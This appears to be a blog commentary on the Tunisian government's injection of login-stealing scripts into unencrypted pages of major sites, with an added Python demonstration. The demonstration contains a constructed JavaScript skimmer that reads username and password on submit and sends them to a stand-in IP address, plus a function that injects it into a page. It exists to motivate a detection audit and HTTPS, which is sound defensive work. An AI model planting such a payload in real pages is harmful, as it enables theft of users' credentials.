The Tunisian manipulation of the login forms on some of the world’s biggest sites could be a much-needed wake-up call for a more security-aware approach to internet-based communication. The hack, if that is the appropriate word in this context, potentially allowed the Tunisian government to read the private communication of hundreds of thousands of users, in the midst of violent nationwide protests.
One of the worst things that can happen to people protesting against an oppressive regime is to have their adversaries spying on them. Some information is public by nature, such as Twitter feeds, and nobody should be surprised that governments monitor it. But there is also a great deal of private correspondence, where the sender may be less careful about keeping their identity hidden. Think email, Facebook messages and closed groups.
The Tunisian case is, as far as I know, the only example we have where there is actual code to analyze. But without doubt the method has been used before by other entities: whoever controls a network can insert scripts into any page that travels over it unencrypted, and doing so is child’s play. If you target the attack at a small number of people, or even one specific individual, the chances of getting caught are very, very slim.
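To make the point concrete, here is an added example (my own illustration, not code from the original post and not the script found in Tunisia): a constructed plain-HTTP login page, a constructed, hypothetical credential-stealing payload, the one-line edit an on-path party needs to insert it, and a small audit that flags scripts which read the password field or talk to a host other than the site itself. The sample page, the payload, the host `example.com` and the address `203.0.113.9` are all assumptions made up for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample login page, as a site might serve it over plain HTTP.
ORIGINAL_PAGE = """<html><head><title>Login</title>
<script src="/static/app.js"></script></head>
<body><form id="login" action="/session" method="post">
<input name="user"><input name="pass" type="password">
<button>Sign in</button></form></body></html>"""

# Constructed, hypothetical payload illustrating the class of script described:
# it hooks the form's submit event, reads both fields and beacons them to a
# foreign host. It is a stand-in for the demonstration, not the real script.
PAYLOAD = """<script>
document.getElementById("login").addEventListener("submit", function () {
  var u = document.getElementsByName("user")[0].value;
  var p = document.getElementsByName("pass")[0].value;
  new Image().src = "http://203.0.113.9/log?u=" + encodeURIComponent(u)
                  + "&p=" + encodeURIComponent(p);
});
</script>"""


def inject(html, payload):
    """What an on-path party does to an unencrypted response: one string edit."""
    head_end = html.find("</head>")
    if head_end < 0:
        return payload + html
    return html[:head_end] + payload + html[head_end:]


class PageScanner(HTMLParser):
    """Collect every script (src or inline body) and every named input."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # (src or None, inline text)
        self.inputs = []       # (name, is_password)
        self._in_script = False
        self._buf = []
        self._src = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._src = a.get("src")
            self._buf = []
        elif tag == "input" and a.get("name"):
            self.inputs.append((a["name"], a.get("type", "text") == "password"))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


URL_RE = re.compile(r"https?://([^/\s\"']+)")


def audit(html, site_host):
    """Return (kind, host) findings for scripts loaded from or beaconing to a host
    other than the site, and for inline scripts that read the password field."""
    scanner = PageScanner()
    scanner.feed(html)
    pw_names = [name for name, is_pw in scanner.inputs if is_pw]
    findings = []
    for src, body in scanner.scripts:
        if src:
            host = urlparse(src).hostname
            if host and host != site_host:
                findings.append(("foreign-script", host))
            continue
        foreign = {h.split(":")[0] for h in URL_RE.findall(body)}
        foreign.discard(site_host)
        reads_pw = any(name in body for name in pw_names)
        if reads_pw and foreign:
            findings.append(("password-exfil", sorted(foreign)[0]))
        elif reads_pw:
            findings.append(("password-read", None))
        elif foreign:
            findings.append(("foreign-beacon", sorted(foreign)[0]))
    return findings


if __name__ == "__main__":
    print(audit(ORIGINAL_PAGE, "example.com"))
    print(audit(inject(ORIGINAL_PAGE, PAYLOAD), "example.com"))
```

The audit is a crude heuristic: a legitimate inline script that touches the password field will trip it, and an attacker who obfuscates names or builds the beacon URL piecewise will slip past it. The only real fix is not to give the network a chance to edit the page at all, which is what serving the login page over HTTPS (and pinning that with HSTS) achieves.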
Most observers seem to agree that the government instigated the Tunisian hack. The timing would certainly suggest so. The code, however, bears no mark of a bureaucratic pen. Quite the opposite, actually.
The script that was inserted has some interesting traits. For some reason, the developer chose to name the functions using leetspeak. We can find hAAAQ3d (hacked), wo0dh3ad (woodhead), us3r (user), pa55 (pass), h6h (hash) and inv0k (invoke) right there in the code.
Leetspeak, the habit of replacing some characters with a digit (or another symbol), is a cliché of the hacker community. One of the first things you do, if you want to be taken seriously in the hacker underground, is to stop speaking leet. Yet, for some reason, leet pops up in this of all places.
The only explanation I can find is that the Tunisian government was trying to conceal its involvement and overcompensated. Big time.